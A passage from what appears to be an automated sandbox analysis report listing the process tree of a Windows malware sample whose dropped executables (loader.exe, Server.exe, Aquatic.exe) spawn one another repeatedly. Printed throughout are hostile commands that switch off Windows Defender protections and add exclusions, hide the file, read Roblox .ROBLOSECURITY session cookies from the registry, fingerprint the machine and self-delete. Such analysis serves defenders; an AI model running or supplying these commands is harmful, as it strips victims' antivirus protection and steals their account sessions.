        6⤵
        
        PID:4112
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:4944
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:2296
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:848
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:908
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:552
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3948
    - - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4140
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:1196
      - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        6⤵
        Executes dropped EXE
        
        PID:4460
      - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2268
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        Executes dropped EXE
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2624
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:3860
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        8⤵
        Views/modifies file attributes
        
        PID:3524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4840
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        8⤵
        
        PID:3716
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        8⤵
        
        PID:5104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:4680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2912
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:700
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4916
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        Executes dropped EXE
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        8⤵
        Executes dropped EXE
        
        PID:3684
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        Executes dropped EXE
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        9⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:4020
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        10⤵
        Views/modifies file attributes
        
        PID:496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        10⤵
        
        PID:1344
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        10⤵
        
        PID:772
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:1788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        10⤵
        Detects videocard installed
        
        PID:4556
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3768
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        Executes dropped EXE
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        10⤵
        Executes dropped EXE
        
        PID:664
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        Executes dropped EXE
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        11⤵
        Executes dropped EXE
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        Executes dropped EXE
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        12⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:4888
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        13⤵
        Views/modifies file attributes
        
        PID:4196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        13⤵
        
        PID:976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        13⤵
        
        PID:1688
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:1788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2000
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        13⤵
        Detects videocard installed
        
        PID:1204
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4248
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        Executes dropped EXE
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        13⤵
        Executes dropped EXE
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        13⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        Executes dropped EXE
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:72
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:4440
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        15⤵
        Views/modifies file attributes
        
        PID:2092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:1172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:1372
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:4268
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:3504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3780
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:4020
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2132
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        14⤵
        Executes dropped EXE
        
        PID:8
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        15⤵
        Executes dropped EXE
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        15⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        15⤵
        Executes dropped EXE
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        16⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1424
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:2192
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        17⤵
        Views/modifies file attributes
        
        PID:2520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:5056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:3460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        17⤵
        
        PID:2828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        17⤵
        
        PID:1156
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:1248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2092
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        17⤵
        Detects videocard installed
        
        PID:1884
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3132
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        16⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1380
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        16⤵
        Executes dropped EXE
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        17⤵
        Executes dropped EXE
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        17⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        17⤵
        Executes dropped EXE
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        18⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:676
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:2808
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        19⤵
        Views/modifies file attributes
        
        PID:1252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        19⤵
        
        PID:1480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        19⤵
        
        PID:2008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:4100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        19⤵
        Detects videocard installed
        
        PID:1544
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2080
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3716
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        18⤵
        Executes dropped EXE
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        19⤵
        Executes dropped EXE
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        19⤵
        Executes dropped EXE
        
        PID:1312
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        20⤵
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        20⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        20⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        21⤵
        
        PID:1552
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:2772
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        22⤵
        Views/modifies file attributes
        
        PID:428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        21⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        21⤵
        
